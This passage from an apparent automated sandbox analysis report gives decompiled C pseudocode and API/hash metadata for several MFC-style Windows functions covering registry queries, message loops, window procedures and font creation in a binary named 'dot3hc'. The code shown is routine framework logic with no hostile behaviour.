					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E0040D3B7();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E0041F7C2(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x4393c0, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E0041F330(_t97, _t101 - 0x48, 0, 0x20);
						E0041F330(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x439340, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E004037E3(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E00413514(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E0040D3B7();
				}
				_t59 = _t98;
				goto L22;
			}

APIs

__EH_prolog3.LIBCMT ref: 004157D7
VariantClear.OLEAUT32(?), ref: 0041586D
_memset.LIBCMT ref: 004158A6
_memset.LIBCMT ref: 004158B2
SysFreeString.OLEAUT32(?), ref: 004158F7
SysFreeString.OLEAUT32(?), ref: 00415901
SysFreeString.OLEAUT32(?), ref: 0041590B

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: b84e5eaf672f1bfb1190bcd0de862ae4c3f2647a4bdaa930b90debcdc623c7f8
Instruction ID: ea0c79ff68116504239c338cd84909263c11110d6238371cb65e95f2b4ede0f1
Opcode Fuzzy Hash: b84e5eaf672f1bfb1190bcd0de862ae4c3f2647a4bdaa930b90debcdc623c7f8
Instruction Fuzzy Hash: BA4148B1E10619EFCF11DFA4C845ADEBB79BF48B24F10811BF015AA290C7789A91CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00405591, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405591(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x443590; // 0x8ffedb05
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E0041F6EA(E00431D73, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E004052F2(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E00405303();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E0041E5DF(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E00403667(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E0040352C( &_v16,  *(_t100 + 0x54));
						_push(0x435478);
						_push( &_v16);
						_push( &_v36);
						_t54 = E0040541E(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E0040541E(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E00403036(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E00405482(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E00405482(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E00403036( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E00403036( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_t6 =  &_v280; // 0x4423e8
						_v280 = 0x442480;
						E0041F7F4(_t6, 0x43c590);
						asm("int3");
						_push(4);
						E0041F6EA(E00431BFC, _t79, 0, _t100);
						_t94 = E0040F014(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E0040D519(_t94);
						}
						return E0041F7C2(_t77);
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 004055B0
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0040566C
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 00405683
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 0040569D
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004056AF

Strings

Software\, xrefs: 00405605

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: f023182a653509516668c61ee528ee225d48264462ccecaf34031b8ebcf169be
Instruction ID: c7b39df0023e7795f59702957f2174eef86f6ceff4bf1e696be6c37735e09762
Opcode Fuzzy Hash: f023182a653509516668c61ee528ee225d48264462ccecaf34031b8ebcf169be
Instruction Fuzzy Hash: E141AB31900509ABCB21EBA5CC41AFFBBB9EF48314F10093BE551F22D1DB799A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040982D, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040982D(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E0040C981(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E00404C27(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E0040501F(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E0040CA4F(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E00404F39(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E00403CEC();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E0040CA4F(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

APIs

GetParent.USER32(?), ref: 0040985B
PeekMessageA.USER32 ref: 00409882
UpdateWindow.USER32(?), ref: 0040989C
SendMessageA.USER32(?,00000121,00000000,?), ref: 004098C0
SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004098DA
UpdateWindow.USER32(?), ref: 00409920
PeekMessageA.USER32 ref: 00409954

Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5b0aaa6aca744f7147385050ea3bf78ee9ed67bc114c1dd5bc6550dd72ee26d1
Instruction ID: 3594d42317ffdf77eda035bd5be05eb9f6962faab1b0a5bda36925cf630a621a
Opcode Fuzzy Hash: 5b0aaa6aca744f7147385050ea3bf78ee9ed67bc114c1dd5bc6550dd72ee26d1
Instruction Fuzzy Hash: 5B41BF712147419BDB21AF26CC84A2BBBE4FFC1B54F04493EF481A12E2D779DD04DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00404592, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404592(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E00403ED6();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E0040DB94(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E0040AF20(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E0040AF20(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E0040AF65(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E0040AF20(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_t2 =  &_v28; // 0x4423e8
						_v28 = 0x442480;
						E0041F7F4(_t2, 0x43c590);
						asm("int3");
						_push(4);
						E0041F6EA(E00431BFC, _t37, _t46, _t51);
						_t43 = E0040F014(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E0040D519(_t43);
						}
						return E0041F7C2(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

APIs

GetCapture.USER32 ref: 0040F951
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F96A
GetFocus.USER32 ref: 0040F97C
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F988
GetLastActivePopup.USER32(?), ref: 0040F9AF
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F9BA
SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0040F9DE

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 2cde3028f60a794a7c700ba65a38728bb5095e0c535c8637e969885bad06cfd8
Instruction ID: 6bbcefccedb64782f514be833ccaebf9a4cac9621966bdcb030a22abc8cdc0d5
Opcode Fuzzy Hash: 2cde3028f60a794a7c700ba65a38728bb5095e0c535c8637e969885bad06cfd8
Instruction Fuzzy Hash: 9C31D5B1700215BBDA316B25DC84F7B76ACAB85798B11003BF501F76D0CB3DEC0596AA

Uniqueness

Uniqueness Score: -1.00%

Function 00409DC5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409DC5(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E00404C1E();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E0040DBC7(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E0041F330(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E00409BF3(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E00409D11(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

APIs

_memset.LIBCMT ref: 00409E52
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00409E7B
GetWindowLongA.USER32 ref: 00409E8D
GetWindowLongA.USER32 ref: 00409E9E
SetWindowLongA.USER32 ref: 00409EBA

Strings

(, xrefs: 00409E71

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 4fc80bdcaf400218dc3c80102da1bb3e0474b3a793b6c10b4ee9a8a9b85137e4
Instruction ID: 9e45313b090639f1ad71dca0b70a2556c303530e875c3b0a022525267220ac75
Opcode Fuzzy Hash: 4fc80bdcaf400218dc3c80102da1bb3e0474b3a793b6c10b4ee9a8a9b85137e4
Instruction Fuzzy Hash: 7E3190716003109FDB20EFA9C884A6FB7B5BF88315B15053EE545A76D2DB39EC40CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00412822, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92
comCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00412822(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E0041F753(E00432C16, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x4361e8;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					_t6 = _t91 - 0x54; // 0x4361e8
					if(E00411C82(_t6, 0x11) != 0) {
						L5:
						_t9 = _t91 - 0x54; // 0x4361e8
						_t49 = _t9;
						goto L6;
					} else {
						_t7 = _t91 - 0x54; // 0x4361e8
						if(E00411C82(_t7, 0xd) != 0) {
							goto L5;
						} else {
							 *((intOrPtr*)(_t90 + 0x64)) = 0;
						}
					}
				} else {
					L6:
					GetObjectA( *(_t49 + 4), 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E004036AB(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					E0040E75E(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E0040ED13(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x439480, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E0040E7B2(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E00403036( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				_t45 = _t91 - 0x54; // 0x4361e8
				 *((intOrPtr*)(_t91 - 0x54)) = 0x4361d8;
				E0040E956(_t45);
				return E0041F7D6(_t74, 0, _t90);
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 0041282C
GetObjectA.GDI32(?,0000003C,?), ref: 0041287E
GetDeviceCaps.GDI32(?,0000005A), ref: 004128EE
OleCreateFontIndirect.OLEAUT32(00000020,00439480), ref: 0041291A

Strings

aC, xrefs: 00412850
, xrefs: 0041288B

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID: $aC
API String ID: 2429671754-2144110735
Opcode ID: 3184c387fc046288f6b644fc771ddd44e823c9d317aa9a87c4637d74b33b126c
Instruction ID: e04894aa077b9c1b9b57ffa01989e5e100f7f590183dedbf99927f803ccce2ea
Opcode Fuzzy Hash: 3184c387fc046288f6b644fc771ddd44e823c9d317aa9a87c4637d74b33b126c
Instruction Fuzzy Hash: 00418D74E012499EDB10DFE6C945ADCFBF4AF58304F10816BE455E72A2E7B88A84CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00404ABD, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404ABD(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x443590; // 0x8ffedb05
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_t4 =  &_v172; // 0x4423e8
					_v172 = 0x442480;
					E0041F7F4(_t4, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, _t38, _t42, _t43);
					_t40 = E0040F014(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E0040D519(_t40);
					}
					return E0041F7C2(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
